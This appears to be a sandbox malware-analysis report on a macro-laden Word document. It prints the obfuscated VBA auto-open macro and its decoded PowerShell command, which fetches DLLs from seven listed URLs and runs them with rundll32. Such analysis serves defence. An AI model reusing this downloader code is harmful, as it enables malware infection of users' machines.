                                                                                                                                    Nov 22, 2021 13:23:13.009969950 CET1212INData Raw: 2f 78 73 2f 4d 6d 44 38 71 48 52 59 4b 35 43 41 48 75 61 54 59 35 6a 66 51 78 46 43 2f 59 6f 49 51 53 53 56 61 66 72 44 2b 57 4b 34 48 30 50 69 76 38 53 41 54 52 5a 43 68 45 58 69 4f 73 33 39 4c 2f 49 59 77 69 4f 78 52 48 67 65 45 4b 63 6d 62 4d
                                                                                                                                    Data Ascii: /xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0q
                                                                                                                                    Nov 22, 2021 13:23:13.010180950 CET1213INData Raw: 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49
                                                                                                                                    Data Ascii: uunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r2
                                                                                                                                    Nov 22, 2021 13:23:13.010404110 CET1214INData Raw: 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20
                                                                                                                                    Data Ascii: ner { width: 70%; } .status-reason { font-size: 450%; } .info-heading { font-size: 200%; } .reason-text { f
                                                                                                                                    Nov 22, 2021 13:23:13.011825085 CET1214INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:13:22:33
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                    Imagebase:0xbb0000
                                                                                                                                    File size:1937688 bytes
                                                                                                                                    MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:39
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                    File size:232960 bytes
                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:40
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:41
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                    Imagebase:0x180000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:23:13
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
                                                                                                                                    Imagebase:0x1070000
                                                                                                                                    File size:61952 bytes
                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Call Graph

                                                                                                                                    Graph

                                                                                                                                    Module: cvbku3gakuisdgfilu3gblaw

                                                                                                                                    Declaration
                                                                                                                                    LineContent
                                                                                                                                    1

                                                                                                                                    Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"

                                                                                                                                    2

                                                                                                                                    Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                    3

                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                    4

                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                    5

                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                    6

                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                    7

                                                                                                                                    Attribute VB_TemplateDerived = True

                                                                                                                                    8

                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                    Executed Functions
                                                                                                                                    APIsMeta Information

                                                                                                                                    Run

                                                                                                                                    Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

                                                                                                                                    CreateObject

                                                                                                                                    CreateObject("RDS.DataSpace")

                                                                                                                                    Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

                                                                                                                                    Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

                                                                                                                                    Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

                                                                                                                                    Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

                                                                                                                                    Replace

                                                                                                                                    Replace(,",","")
                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    "elf"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    "elf"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    "elf"
                                                                                                                                    "elf"
                                                                                                                                    """"
                                                                                                                                    ","
                                                                                                                                    """"
                                                                                                                                    ","
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    69

                                                                                                                                    Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 as Long, bvagh4iauhoshetret as Long, fbhqwieusiyeoiwugeig as String)

                                                                                                                                    69

                                                                                                                                    Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf as String

                                                                                                                                    executed
                                                                                                                                    70

                                                                                                                                    Dim s1, ra as String

                                                                                                                                    70

                                                                                                                                    Dim bfik3uvgikuds as Double

                                                                                                                                    71

                                                                                                                                    Dim dvfghwkuibisdbgfiw as Object

                                                                                                                                    72

                                                                                                                                    Dim d, R as Double

                                                                                                                                    73

                                                                                                                                    For bkwefiusdif = 1 To 10

                                                                                                                                    74

                                                                                                                                    If bkwefiusdif = 7 Then

                                                                                                                                    75

                                                                                                                                    dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0

                                                                                                                                    Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

                                                                                                                                    executed
                                                                                                                                    76

                                                                                                                                    Else

                                                                                                                                    77

                                                                                                                                    If bkwefiusdif = 3 Then

                                                                                                                                    78

                                                                                                                                    Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))

                                                                                                                                    CreateObject("RDS.DataSpace")

                                                                                                                                    executed
                                                                                                                                    79

                                                                                                                                    Dim fs as Integer

                                                                                                                                    79

                                                                                                                                    If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > - 0.0134542765 Then

                                                                                                                                    79

                                                                                                                                    fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")

                                                                                                                                    79

                                                                                                                                    Endif

                                                                                                                                    80

                                                                                                                                    Endif

                                                                                                                                    81

                                                                                                                                    Endif

                                                                                                                                    82

                                                                                                                                    Next

                                                                                                                                    83

                                                                                                                                    If d <> 0.123456 Then

                                                                                                                                    84

                                                                                                                                    ra = Replace(s1, ",", "")

                                                                                                                                    Replace(,",","")

                                                                                                                                    executed
                                                                                                                                    85

                                                                                                                                    Endif

                                                                                                                                    86

                                                                                                                                    End Sub

                                                                                                                                    APIsMeta Information

                                                                                                                                    Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Run

                                                                                                                                    Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: CreateObject

                                                                                                                                    Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Replace

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\"".""Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    107

                                                                                                                                    Private Sub Document_Open()

                                                                                                                                    107

                                                                                                                                    Dim gzjohestiha4otihsdoa8ef as String

                                                                                                                                    executed
                                                                                                                                    108

                                                                                                                                    fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"

                                                                                                                                    109

                                                                                                                                    End Sub

                                                                                                                                    APIsMeta Information

                                                                                                                                    Replace

                                                                                                                                    Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace Replace("celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj="$selftrs=\"helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\".Selfplelfit(\",\");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\"celf:elf\pelfroelfgraelfmdelfatelfa\\\"+elf$relf1+\".delflelfl\";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\"celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\";$aelf=$telfpelfth+\",felf\"+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};";IelfEelfX $delffkj","elf","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj Replace("WRIsRIcRIriRIpt.RISRIheRIlRIl","RI","") -> Wscript.Shell

                                                                                                                                    MsgBox

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    """"
                                                                                                                                    ","
                                                                                                                                    ","
                                                                                                                                    ","
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    37

                                                                                                                                    Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk as String, dfh3olhuiefoiasihkl as String) as String

                                                                                                                                    38

                                                                                                                                    Dim cbuay7aygsikjbkv as Integer

                                                                                                                                    executed
                                                                                                                                    39

                                                                                                                                    Dim fjoq3wihrpoa8fghoashf as String

                                                                                                                                    39

                                                                                                                                    cbuay7aygsikjbkv = 10

                                                                                                                                    39

                                                                                                                                    fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")

                                                                                                                                    Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace

                                                                                                                                    executed
                                                                                                                                    40

                                                                                                                                    For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv

                                                                                                                                    41

                                                                                                                                    If sgdyuiwuygiasb > 20 Then

                                                                                                                                    42

                                                                                                                                    MsgBox ","

                                                                                                                                    MsgBox

                                                                                                                                    43

                                                                                                                                    Endif

                                                                                                                                    44

                                                                                                                                    Next

                                                                                                                                    45

                                                                                                                                    goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf

                                                                                                                                    46

                                                                                                                                    End Function

                                                                                                                                    Non-Executed Functions
                                                                                                                                    APIsMeta Information

                                                                                                                                    Clear

                                                                                                                                    FreeFile

                                                                                                                                    Open

                                                                                                                                    ff

                                                                                                                                    LOF

                                                                                                                                    ff

                                                                                                                                    String

                                                                                                                                    Chr

                                                                                                                                    ff

                                                                                                                                    ff

                                                                                                                                    vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    Len

                                                                                                                                    Asc

                                                                                                                                    Mid

                                                                                                                                    txt

                                                                                                                                    IIf

                                                                                                                                    Len

                                                                                                                                    Hex

                                                                                                                                    R

                                                                                                                                    BYTES_PER_ROW&

                                                                                                                                    vbNewLine

                                                                                                                                    DoEvents

                                                                                                                                    Len

                                                                                                                                    vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    """"
                                                                                                                                    """"
                                                                                                                                    """"
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    87

                                                                                                                                    Private Function dfjolirhoghwow(ByVal filename$, optional ByVal name$ = "") as String

                                                                                                                                    88

                                                                                                                                    On Error Resume Next

                                                                                                                                    88

                                                                                                                                    Err.Clear

                                                                                                                                    Clear

                                                                                                                                    88

                                                                                                                                    Const BYTES_PER_ROW = 480

                                                                                                                                    89

                                                                                                                                    Dim F_Content as String

                                                                                                                                    90

                                                                                                                                    ff& = FreeFile

                                                                                                                                    FreeFile

                                                                                                                                    90

                                                                                                                                    Open filename$ For Binary Access Read As # ff

                                                                                                                                    Open

                                                                                                                                    ff

                                                                                                                                    91

                                                                                                                                    fs& = LOF(ff)

                                                                                                                                    LOF

                                                                                                                                    ff

                                                                                                                                    91

                                                                                                                                    txt$ = String(fs&, Chr(0))

                                                                                                                                    String

                                                                                                                                    Chr

                                                                                                                                    92

                                                                                                                                    Get # ff, , txt$

                                                                                                                                    ff

                                                                                                                                    92

                                                                                                                                    Close # ff

                                                                                                                                    ff

                                                                                                                                    93

                                                                                                                                    F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    94

                                                                                                                                    F_Content$ = F_Content$ & "" & vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    95

                                                                                                                                    For i = 1 To Len(txt$)

                                                                                                                                    Len

                                                                                                                                    96

                                                                                                                                    R& = Asc(Mid(txt, i, 1))

                                                                                                                                    Asc

                                                                                                                                    Mid

                                                                                                                                    txt

                                                                                                                                    97

                                                                                                                                    res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)

                                                                                                                                    IIf

                                                                                                                                    Len

                                                                                                                                    Hex

                                                                                                                                    R

                                                                                                                                    98

                                                                                                                                    If i Mod BYTES_PER_ROW& = 0 Then

                                                                                                                                    BYTES_PER_ROW&

                                                                                                                                    99

                                                                                                                                    F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    100

                                                                                                                                    res = ""

                                                                                                                                    100

                                                                                                                                    DoEvents

                                                                                                                                    DoEvents

                                                                                                                                    101

                                                                                                                                    Endif

                                                                                                                                    102

                                                                                                                                    Next

                                                                                                                                    Len

                                                                                                                                    103

                                                                                                                                    If Len(res) Then

                                                                                                                                    Len

                                                                                                                                    103

                                                                                                                                    F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    103

                                                                                                                                    Endif

                                                                                                                                    104

                                                                                                                                    F_Content$ = F_Content$ & "" & vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    105

                                                                                                                                    FileToVBAFunction = F_Content$

                                                                                                                                    106

                                                                                                                                    End Function

                                                                                                                                    APIsMeta Information

                                                                                                                                    Collection

                                                                                                                                    Workbooks

                                                                                                                                    name

                                                                                                                                    ThisWorkbook

                                                                                                                                    Windows

                                                                                                                                    name

                                                                                                                                    Add

                                                                                                                                    CStr

                                                                                                                                    name

                                                                                                                                    Count

                                                                                                                                    MsgBox

                                                                                                                                    vbCritical

                                                                                                                                    Workbooks

                                                                                                                                    Count

                                                                                                                                    vbTab

                                                                                                                                    vbNewLine

                                                                                                                                    vbNewLine

                                                                                                                                    InputBox

                                                                                                                                    IsNumeric

                                                                                                                                    Workbooks

                                                                                                                                    Val

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    "&"
                                                                                                                                    ","
                                                                                                                                    ","
                                                                                                                                    ","
                                                                                                                                    "&"
                                                                                                                                    ","
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    47

                                                                                                                                    Function gajowisjd90asdilkf() as Object

                                                                                                                                    48

                                                                                                                                    On Error Resume Next

                                                                                                                                    49

                                                                                                                                    Dim coll as New Collection, WB as Workbook

                                                                                                                                    Collection

                                                                                                                                    50

                                                                                                                                    For Each WB in Workbooks

                                                                                                                                    Workbooks

                                                                                                                                    51

                                                                                                                                    If WB.name <> ThisWorkbook.name Then

                                                                                                                                    name

                                                                                                                                    ThisWorkbook

                                                                                                                                    52

                                                                                                                                    If Windows(WB.name).Visible Then

                                                                                                                                    Windows

                                                                                                                                    name

                                                                                                                                    52

                                                                                                                                    coll.Add CStr(WB.name)

                                                                                                                                    Add

                                                                                                                                    CStr

                                                                                                                                    name

                                                                                                                                    52

                                                                                                                                    Endif

                                                                                                                                    53

                                                                                                                                    Endif

                                                                                                                                    54

                                                                                                                                    Next WB

                                                                                                                                    Workbooks

                                                                                                                                    55

                                                                                                                                    Select Case coll.Count

                                                                                                                                    Count

                                                                                                                                    56

                                                                                                                                    Case 0

                                                                                                                                    57

                                                                                                                                    MsgBox ",", vbCritical, ","

                                                                                                                                    MsgBox

                                                                                                                                    vbCritical

                                                                                                                                    58

                                                                                                                                    Case 1

                                                                                                                                    59

                                                                                                                                    Set GetAnotherWorkbook = Workbooks(coll(1))

                                                                                                                                    Workbooks

                                                                                                                                    60

                                                                                                                                    Case Else

                                                                                                                                    61

                                                                                                                                    For i = 1 To coll.Count

                                                                                                                                    Count

                                                                                                                                    62

                                                                                                                                    txt = txt & i & vbTab & coll(i) & vbNewLine

                                                                                                                                    vbTab

                                                                                                                                    vbNewLine

                                                                                                                                    63

                                                                                                                                    Next i

                                                                                                                                    Count

                                                                                                                                    64

                                                                                                                                    msg = "&" & vbNewLine & vbNewLine & txt

                                                                                                                                    vbNewLine

                                                                                                                                    65

                                                                                                                                    res = InputBox(msg, ",", 1)

                                                                                                                                    InputBox

                                                                                                                                    66

                                                                                                                                    If IsNumeric(res) Then

                                                                                                                                    IsNumeric

                                                                                                                                    66

                                                                                                                                    Set GetAnotherWorkbook = Workbooks(coll(Val(res)))

                                                                                                                                    Workbooks

                                                                                                                                    Val

                                                                                                                                    66

                                                                                                                                    Endif

                                                                                                                                    67

                                                                                                                                    End Select

                                                                                                                                    Count

                                                                                                                                    68

                                                                                                                                    End Function

                                                                                                                                    APIsMeta Information

                                                                                                                                    GetAnotherWorkbook

                                                                                                                                    MsgBox

                                                                                                                                    FullName

                                                                                                                                    vbInformation

                                                                                                                                    MsgBox

                                                                                                                                    vbCritical

